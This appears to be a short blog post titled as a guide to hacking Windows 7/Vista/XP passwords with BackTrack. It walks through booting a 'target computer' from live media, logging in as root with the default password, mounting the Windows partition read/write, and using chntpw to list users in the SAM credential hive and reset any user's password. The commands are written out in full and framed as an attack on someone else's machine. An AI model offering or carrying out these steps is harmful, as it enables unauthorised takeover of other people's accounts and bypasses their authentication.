How to Hack Windows 7/Vista/XP Password Using BackTrack?
- First of all boot your target computer using BackTrack Live CD or USB drive.
- Once Backtrack is booted, log in to the root user account using the default password: toor. Type in startx to start the GUI.
- Now go for Application > Privilege Escalation > Password Attacks > Offline Attack > chntpw.
- Identify and mount your Windows partition in read/write mode using below commands:
umount /mnt/hda1
modprobe fuse
ntfsmount /dev/hda1 /mnt/hda1
If your hard disk is SATA type then you need to use /sda1 instead of /hda1 in the above steps. - To list out all the users in the Windows SAM registry hive:
./chntpw -l /mnt/hda1/windows/system32/config/SAM - To reset the password for any specific user:
./chntpw -u username /mnt/hda1/windows/system32/config/SAM
No comments:
Post a Comment